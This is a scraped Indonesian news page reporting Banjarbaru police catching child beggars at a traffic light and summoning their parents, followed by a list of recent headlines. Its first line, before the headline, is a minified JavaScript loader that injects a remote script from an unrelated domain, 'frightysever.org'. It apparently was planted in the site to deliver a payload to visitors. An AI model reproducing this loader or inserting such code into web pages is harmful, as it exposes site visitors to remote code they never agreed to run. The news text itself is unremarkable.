(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kucing-kucingan Anak Kecil vs Satpol PP di Lampu Lalulintas Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Kali kesekian, anak kecil Penyandang Masalah Kesejahteraan Sosial (PMKS) di kawasan lampu lalulintas atau traffic light Jalan A Yani Km 33 Loktabat Kota Banjarbaru, Kalimantan Selatan (Kalsel), digaruk anggota Satpol PP.

Selasa (7/5/2024) sore, tiga anak kucing-kucingan dengan anggota Satpol PP Banjarbary saat hendak dibawa hingga membuat geram petugas.

Dua di antara anak berhasil ditangkap petugas Satpol PP Banjarbaru untuk dititipkan ke rumah singgah Dinas Sosial Banjarbaru, sebelum mereka dipanggil orangtuanya.

Baca juga: Uji Trayek Angkutan Bus Pengumpan di Kota Banjarbaru

Kasatpol PP Banjarbaru, Hidayaturahman mengatakan, anak-anak pengemis tersebut sudah beberapa kali didapati petugas kemudian diamankan untuk dipanggil orangtuanya, namun masih saja membuat ulah.

“Kembali kita menemukan pengemis anak-anak yang sudah pernah diamankan, dan kita amankan kembali karena mengingat anak tersebut sangat kecil untuk berada di jalanan,” ungkap Kasatpol PP Banjarbaru, Selasa (7/5/2024) sore.

Lebih lanjut dijelaskan Dayat -sapaan akrabnya-, orangtua yang diduga memperkerjakan anak kecil itu akan dihadapkan ke Mako Satpol PP Banjarbaru pada Rabu (8/5/2024.).

Baca juga: WTP Ke-11 untuk Pemkab Banjar, Wabup Banjar: Ini Kerja Tulus Semua Perangkat Daerah

“Kita panggil kembali orangtuanya untuk kita berikan pencerahan dan pembinaan agar mendidik anaknya dengan lebih baik,” jelas dia.

Mengingat kali kesekian orangtua dipanggil, tidak menutup kemungkinan kata dia, orangtua dari anak pengemis tersebut diberikan sanksi yang lebih berat.

“Akan kita minta orangtua membuat pernyataan, apabila masih didapati kemudian hari kita terapkan sanksi yang lebih tegas,” sambungnya.

Dirinya mengakui tentang PMKS yang banyak berseliweran dalam beberapa pekan terakhir di kawasan lampu merah.

Modus mereka mengemis bermacam-macam dan dengan wujud berbeda, termasuk yang mengeksploitasi anak kecil.

Baca juga: Nongkrong di Eks Lokalisasi Pembatuan, Dua Perempuan Dibawa Satpol PP

“Memang saat ini di Banjarbaru marak sekali PMKS di lampu merah, baik itu pengemis, pengamen maupun pekerja yang memberikan jasa membersihkan mobil,” ungkapnya.

Hal tersebut, sambung dia, membuat Satpol PP merapatkan barisan untuk melakukan penertiban berkala.

“Tetap akan kita tindak kita tertibkan secara berkala bahkan saat hari libur kami menempatkan personel-personel di titik yang kami anggap rawan kegiatan PMKS,” tuntas Dayat. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Risa

Recent Posts

Terselip Nama Aditya, PKB Keluarkan Rekomendasi 65 Calon Kepala Daerah

DPP PKB: Belum Ada Satu Rekomendasi Pun untuk Gubernur Read More

4 jam ago

Petani di HSU Dibekali Pelatihan Penggunaan Pestisida Terbatas

KANALKALIMANTAN.COM, AMUNTAI - Memanfaatkan herbisida aktif parakuat diklorida secara optimal dengan mengurangi dampak sekecil mungkin,… Read More

5 jam ago

BBPOM Gelar Bimtek Keamanan Pangan untuk Kader KPS Se-Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bimbingan Teknis (Bimtek) Keamanan Pangan untuk Kader Keamanan Pangan Sekolah (KPS) se-Kabupaten… Read More

5 jam ago

Hattrick PLN Raih Laba Bersih, Keuangan Terbaik Sepanjang Sejarah Perseroan

KANALKALIMANTAN.COM, JAKARTA - PT PLN (Persero) sukses membukukan keuntungan terbesar sepanjang sejarah perseroan dengan meraih… Read More

6 jam ago

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

8 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

8 jam ago

This website uses cookies.